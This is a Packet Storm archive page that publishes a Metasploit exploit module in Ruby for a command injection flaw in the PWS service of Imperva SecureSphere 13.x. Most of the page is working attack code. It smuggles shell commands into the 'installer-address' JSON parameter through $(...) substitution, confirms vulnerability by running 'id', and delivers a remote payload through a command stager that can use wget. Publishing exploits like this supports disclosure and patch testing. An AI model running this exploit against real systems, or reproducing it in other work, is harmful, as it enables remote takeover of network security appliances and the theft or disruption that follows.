exploit the possibilities

Imperva SecureSphere 13.x PWS Command Injection

Imperva SecureSphere 13.x PWS Command Injection
Posted Mar 6, 2019
Authored by rsp3ar | Site metasploit.com

This Metasploit module exploits a command injection vulnerability in Imperva SecureSphere version 13.x. The vulnerability exists in the PWS service, where Python CGIs did not properly sanitize user supplied command parameters and directly passes them to corresponding CLI utility, leading to command injection. Agent registration credential is required to exploit SecureSphere in gateway mode. This module was successfully tested on Imperva SecureSphere 13.0/13.1/13.2 in pre-ftl mode and unsealed gateway mode.

tags | exploit, cgi, python
MD5 | e604d6ec0f3e74e3aaaaa80c5c18a797

Imperva SecureSphere 13.x PWS Command Injection

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Imperva SecureSphere PWS Command Injection',
'Description' => %q(
This module exploits a command injection vulnerability in Imperva
SecureSphere 13.x. The vulnerability exists in the PWS service,
where Python CGIs didn't properly sanitize user supplied command
parameters and directly passes them to corresponding CLI utility,
leading to command injection. Agent registration credential is
required to exploit SecureSphere in gateway mode.

This module was successfully tested on Imperva SecureSphere 13.0/13.1/
13.2 in pre-ftl mode and unsealed gateway mode.
),
'License' => MSF_LICENSE,
'Author' =>
[
'rsp3ar <lukunming<at>gmail.com>' # Discovery/Metasploit Module
],
'References' =>
[
[ 'EDB', '45542' ]
],
'DisclosureDate' => "Oct 8 2018",
'DefaultOptions' => {
'SSL' => true,
'PrependFork' => true,
},
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'CmdStagerFlavor' => %w{ echo printf wget },
'Targets' =>
[
['Imperva SecureSphere 13.0/13.1/13.2', {}]
],
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(443),
OptString.new('USERNAME', [false, 'Agent registration username', 'imperva']),
OptString.new('PASSWORD', [false, 'Agent registration password', '']),
OptString.new('TARGETURI', [false, 'The URI path to impcli', '/pws/impcli']),
OptInt.new('TIMEOUT', [false, 'HTTP connection timeout', 15])
])
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false])
]
end

def check
begin
res = execute_command('id')
rescue => e
vprint_error("#{e}")
return CheckCode::Unknown
end

if res.body =~ /uid=\d+/
return CheckCode::Vulnerable
end

CheckCode::Safe
end

def exploit
unless CheckCode::Vulnerable == check
unless datastore['ForceExploit']
fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
end
print_warning 'Target does not appear to be vulnerable'
end

print_status("Sending payload #{datastore['PAYLOAD']}")
execute_cmdstager
end

def execute_command(cmd, opts = {})
data = {
'command' => 'impctl server status',
'parameters' => {
'broadcast' => true,
'installer-address' => "127.0.0.1 $(#{cmd})"
}
}

res = send_request data

return unless res

if res.code == 401
fail_with(Failure::NoAccess, 'Authorization Failure, valid agent registration credential is required')
end

unless res.code == 406 && res.body.include?("impctl")
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

res
end

def send_request(data)
req_params = {
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'data' => data.to_json
}

if !datastore['USERNAME'].blank? && !datastore['PASSWORD'].blank?
unless @cookie
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('/')
})
unless res
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end

@cookie = res.get_cookies
end

req_params['cookie'] = @cookie
req_params['headers'] = {
'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
}
end

send_request_cgi(req_params, datastore['TIMEOUT'])
end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    16 Files
  • 18
    May 18th
    2 Files
  • 19
    May 19th
    1 Files
  • 20
    May 20th
    11 Files
  • 21
    May 21st
    21 Files
  • 22
    May 22nd
    20 Files
  • 23
    May 23rd
    36 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close